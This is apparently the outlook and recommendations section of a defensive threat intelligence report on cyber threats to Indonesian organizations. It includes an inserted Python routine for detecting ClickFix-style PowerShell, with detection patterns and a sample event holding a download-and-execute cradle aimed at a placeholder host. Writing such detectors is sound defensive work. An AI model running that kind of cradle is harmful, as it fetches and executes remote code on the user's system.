Organizations operating in Indonesia must move from reactive postures to intelligence-led, proactive security operations. The threat environment will not stabilize in the near term. Actors will continue to adapt, retool, and find new vectors. Resilience, early detection, and continuous threat intelligence operationalization are the minimum requirement for organizations seeking to reduce exposure in this environment.

FORWARD OUTLOOK

The threat environment facing Indonesian organizations is assessed to intensify across all major categories through the second half of 2026 and into 2027. The structural conditions that made Indonesia a high-priority target during the December 2025 to May 2026 reporting period, including rapid digital expansion outpacing security investment, extensive unpatched IoT infrastructure, a regulatory framework in transition, and a large internet-connected population with relatively low security awareness, will remain in place and will continue to be systematically exploited by adversaries with demonstrated knowledge of the Indonesian environment.

Ransomware Operations Will Expand in Sophistication and Sectoral Reach
The emergence of LockBit5 and CoinbaseCartel as leading operators during the reporting period signals a generational shift in the RaaS ecosystem toward more resilient, decentralized affiliate models that are harder to disrupt through single takedown operations. Triple-extortion pressure incorporating DDoS alongside encryption and data leak threats is expected to become standard practice. Critical infrastructure sectors including energy, water utilities, and transportation, which recorded lower incident volumes during the reporting period but carry the highest consequence potential, are assessed as priority targets for escalating ransomware attention through 2026 to 2027, consistent with the global trajectory of RaaS operator target selection.

State-Sponsored Espionage Will Deepen Against Strategic Sectors
Chinese state-linked actors including Mustang Panda, APT41, and Lotus Blossom will sustain and likely intensify operations against Indonesian government, critical minerals, telecommunications, and maritime sectors. Indonesia’s nickel and critical minerals policy, its ASEAN leadership role, and its bilateral relationships with both Washington and Beijing ensure it remains a durable intelligence collection priority. The demonstrated willingness of actors such as Amaranth-Dragon to calibrate intrusion campaigns to Indonesia’s domestic policy calendar confirms that adversary intelligence about the Indonesian operating environment is detailed and continuously updated. Supply chain compromise as an initial access vector is expected to increase as perimeter defenses improve and direct exploitation becomes more resource intensive.

AI-Enabled Attack Capability Will Become Mainstream
AI-assisted phishing, deepfake-enabled social engineering, and adaptive malware evasion, each documented during the reporting period, are expected to transition from emerging to standard attack tooling through 2026 to 2027. The democratization of AI-generated lure creation will reduce the skill threshold required for high-credibility spear-phishing, expanding the pool of actors capable of conducting convincing targeted campaigns against Indonesian executives, government officials, and citizens. Deepfake audio and video used in financial fraud and disinformation operations will increase in volume and quality, with Indonesian-language deepfake capability specifically assessed as a growth area given the commercial interest of fraud operators in Indonesia’s large digital banking population.

Mobile Banking Fraud Will Remain a Population-Scale Threat
The Coretax campaign’s exploitation of Indonesia’s tax filing season established a template that financially motivated actors will replicate against other high-engagement government digital services including social security (BPJS), fuel subsidy platforms, and digital identity infrastructure. SURXRAT V5’s malware-as-a-service distribution model, operated domestically and sold to global resellers, indicates that Indonesia is developing an indigenous mobile fraud capability ecosystem that will generate new tooling and campaign variants independent of external actor direction. Android-targeted attack chains will continue to evolve in response to banking application security improvements, with accessibility service abuse, overlay attacks, and OTP interception remaining primary techniques.

Botnet Infrastructure Will Continue to Regenerate
The rapid emergence of Nexcorium and Tuxnokill following the March 2026 disruption of Aisuru and Kimwolf confirmed that takedown operations alone are insufficient to resolve Indonesia’s botnet exposure. The underlying conditions driving infection, including millions of consumer IoT devices running end-of-life firmware with default credentials and no patch management, will persist until ISP-level remediation programs and mandatory security baseline requirements for consumer IoT devices are implemented at regulatory scale. Indonesia’s compromised IoT infrastructure will continue to serve as attack staging, DDoS capacity, and proxy infrastructure for both domestic and internationally operated threat actors through 2026 and beyond.

The Regulatory Transition Window Represents a Near-Term Exploitation Opportunity
The period between the anticipated enactment of the Cybersecurity and Cyber Resilience Bill and the full operational maturity of the Personal Data Protection Agency represents the most consequential near-term risk window for Indonesian organizations and government entities. Sophisticated actors aware of Indonesia’s regulatory timeline will assess this period as one of reduced enforcement pressure, with organizational attention diverted to compliance preparation rather than threat detection. Organizations should treat the transition as a window of elevated operational risk rather than reduced threat activity, maintaining or increasing security operations tempo while compliance frameworks mature.

Underground Data Markets Will Sustain Downstream Fraud Risk
The volume and diversity of Indonesian citizen and institutional data sets available in underground markets and Telegram channels as of May 2026 will continue to serve as targeting infrastructure for downstream phishing, identity fraud, and account takeover operations well beyond the original breach events. Aggregated data sets combining NPWP taxpayer records, mobile subscriber information, banking credentials, and government personnel data enable threat actors to construct highly credible, personalized fraud campaigns at scale. The downstream fraud risk from data sets already in circulation is assessed as a multi-year exposure that will persist regardless of improvements in upstream breach prevention.

RECOMMENDATIONS

STRATEGIC RECOMMENDATIONS

Enterprise Ransomware Resilience: Strengthen ransomware preparedness through double-extortion response playbooks, executive-level crisis simulations, and immutable offline backup strategies with validated recovery time objectives. Integrate ransomware early-warning indicators and dark web monitoring into enterprise risk dashboards.

Mobile Security and Anti-Fraud Posture: Deploy mobile threat defense solutions and enforce APK sideloading restrictions across managed devices. Implement behavioral analytics for mobile banking transaction monitoring and establish vishing detection capability within fraud operations centers, with targeted user awareness training on Coretax and tax platform impersonation campaign mechanics.

Supply Chain and Third-Party Risk Governance: Implement formal software validation controls including code signing and hash verification for all enterprise software and update packages. Enforce vendor security assessments for remote access and network infrastructure providers and include contractual breach notification obligations for critical third parties.

Cloud and AI Security Governance: Implement AI governance policies restricting sensitive data exposure through externally hosted platforms and strengthen cloud security posture management across all enterprise cloud services. Deploy behavioral analytics to detect anomalous interactions with Dropbox, Twitter/X, and Zimbra, given their confirmed use as C2 channels by active threat actors targeting Indonesian organizations.

Regulatory Compliance Readiness: Conduct gap assessments against the Cybersecurity and Cyber Resilience Bill and PDP Law requirements before enforcement takes effect. Formalize regulatory notification workflows and align cybersecurity investment with confirmed sector-specific threat exposure across finance, government, energy, and telecommunications.

TACTICAL RECOMMENDATIONS

Vulnerability Prioritization and Patch Validation: Immediately validate remediation status for CVE-2026-41940, CVE-2023-20198, CVE-2021-42013, CVE-2017-9841, and CVE-2025-8088, prioritizing Confluence, Ivanti, Cisco IOS XE, and Junos OS deployments. Conduct targeted scanning of all internet-facing assets and monitor authentication logs for bypass attempts and abnormal privilege escalation.

Detection for RAT and Backdoor Activity: Deploy detection rules for confirmed active malware families including SURXRAT V5, Coretax RAT, MIMICRAT, GigaBud.RAT, TGAmaranth RAT, ValleyRAT, ABCDoor, and Sagerunex across endpoint, network, and email security platforms. Monitor for DLL sideloading patterns, ClickFix-style PowerShell execution chains, and anomalous outbound beaconing to cloud platforms.
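One way to operationalize the ClickFix-style PowerShell detection recommended above, as an added example that is not part of this report or any vendor's rule set: a small Python triage routine run over constructed process-creation events (Sysmon Event ID 1 shape) that flags a PowerShell host launched from an interactive parent when the command line stacks several lure-style indicators. The parent set, indicator list, threshold and all sample values are assumptions to tune against local telemetry.

```python
import re

# Constructed process-creation events (parent, image, command line), in the
# shape of Sysmon Event ID 1 / EDR telemetry; all values are made up for this example.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     'powershell -w hidden -nop -ep bypass -c "iex (irm http://lure.example.invalid/verify)"'),
    ("svchost.exe", "powershell.exe",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    ("explorer.exe", "powershell.exe", "powershell.exe"),
    ("explorer.exe", "pwsh.exe",
     "pwsh -NoProfile -EncodedCommand SQBFAFgAIAAoAEkAUgBNACAA..."),
]

# ClickFix lures have the victim paste a command into the Run dialog or a
# terminal, so the interesting parents are the interactive shells (assumed set).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}

# Each indicator is weak on its own (admins use -ExecutionPolicy Bypass too);
# a pasted lure typically stacks several, so we count rather than match one.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "no_profile": re.compile(r"-no(p|profile)\b", re.I),
    "policy_bypass": re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"\b(irm|iwr|Invoke-WebRequest|Invoke-RestMethod|DownloadString|Net\.WebClient)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
}

def matched_indicators(cmd: str) -> list[str]:
    """Names of the lure-style indicators present in a command line, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def is_clickfix_like(parent: str, image: str, cmd: str, threshold: int = 2) -> bool:
    """PowerShell host, interactive parent, and at least `threshold` indicators.
    A scheduled-task script (svchost parent) or a plain console launch stays quiet."""
    if image.lower() not in POWERSHELL_HOSTS or parent.lower() not in INTERACTIVE_PARENTS:
        return False
    return len(matched_indicators(cmd)) >= threshold

def triage(events: list[tuple[str, str, str]]) -> list[dict]:
    """Return one alert record per flagged event, with the indicators that fired."""
    return [
        {"parent": p, "image": i, "indicators": matched_indicators(c)}
        for p, i, c in events if is_clickfix_like(p, i, c)
    ]
```

Running `triage(SAMPLE_EVENTS)` flags the two explorer-spawned launches (the paste-and-run cradle and the encoded command) while leaving the scheduled inventory script and the bare console launch alone.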

Credential Theft and Infostealer Defense: Enforce phishing-resistant multifactor authentication across all privileged and remote access accounts and monitor endpoint telemetry for browser credential extraction and mass credential dumping activity. Conduct continuous dark web monitoring for exposed corporate credentials and establish rapid rotation workflows when organizational data appears in underground marketplaces.

Botnet and IoT Infrastructure Defense: Conduct immediate IoT asset discovery to enumerate all internet-exposed routers, DVRs, IP cameras, and Android IoT devices, prioritizing remediation of firmware affected by CVE-2024-3721 and CVE-2025-29635. Segment IoT networks from core enterprise infrastructure and enforce firmware lifecycle management to reduce re-infection risk from successor botnet variants.

OPERATIONAL RECOMMENDATIONS

Continuous Threat Hunting: Conduct monthly intelligence-led threat hunts focused on lateral movement using valid credentials, data staging behavior before exfiltration, ClickFix and Havoc C2 execution chains, cloud identity misuse, and Android accessibility service abuse consistent with confirmed actor tradecraft in Indonesian environments.

Dark Web and Data Leak Monitoring: Maintain continuous monitoring for organization-specific identifiers across dark web forums and Telegram channels, with a rapid validation and notification workflow aligned to PDP Law obligations. Pre-align legal escalation and communications procedures before incidents occur.

Network Segmentation and IoT Hardening: Segment IoT and operational technology networks from core enterprise systems, enforce firmware patch tracking, and monitor for anomalous outbound connections from non-traditional endpoints. Conduct periodic asset discovery exercises to identify unmanaged devices introduced outside formal security assessment processes.

Executive and Mobile Security Controls: Deploy mobile threat defense for executives, legal professionals, journalists, and civil society leaders facing elevated zero-click exploit risk. Enforce device patch compliance and sideloading restrictions through mobile device management and deliver targeted awareness training on population-scale mobile fraud campaign mechanics confirmed during the reporting period.